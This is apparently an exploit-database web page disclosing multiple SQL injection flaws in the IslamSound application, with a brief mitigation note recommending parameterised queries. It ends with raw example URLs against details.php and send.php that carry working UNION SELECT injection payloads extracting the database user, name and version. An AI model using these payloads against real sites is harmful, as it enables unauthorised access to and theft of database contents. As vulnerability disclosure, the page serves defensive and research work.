Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Multiple Remote SQL Injection Vulnerabilities in IslamSound - exploit.company
header-logo
Suggest Exploit
vendor:
IslamSound
by:
Not mentioned
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: IslamSound
Affected Version From: Not mentioned
Affected Version To: Not mentioned
Patch Exists: Not mentioned
Related CWE: Not mentioned
CPE: Not mentioned
Metasploit:
Other Scripts:
Platforms Tested: Not mentioned
Not mentioned

Multiple Remote SQL Injection Vulnerabilities in IslamSound

The IslamSound application is prone to multiple remote SQL injection vulnerabilities. These vulnerabilities can be exploited by sending specially crafted requests to the affected application. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Mitigation:

To mitigate these vulnerabilities, it is recommended to implement proper input validation and parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/39880/info

IslamSound is prone to multiple remote SQL injection vulnerabilities.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/sound.php?catid=2 sql
http://www.example.com/details.php?linkid=-7 union select user(),1,2,database(),version(),5,6,7,8--
http://www.example.com/send.php?linkid=-5 union select user(),1,2,3,4,5,6,7,8--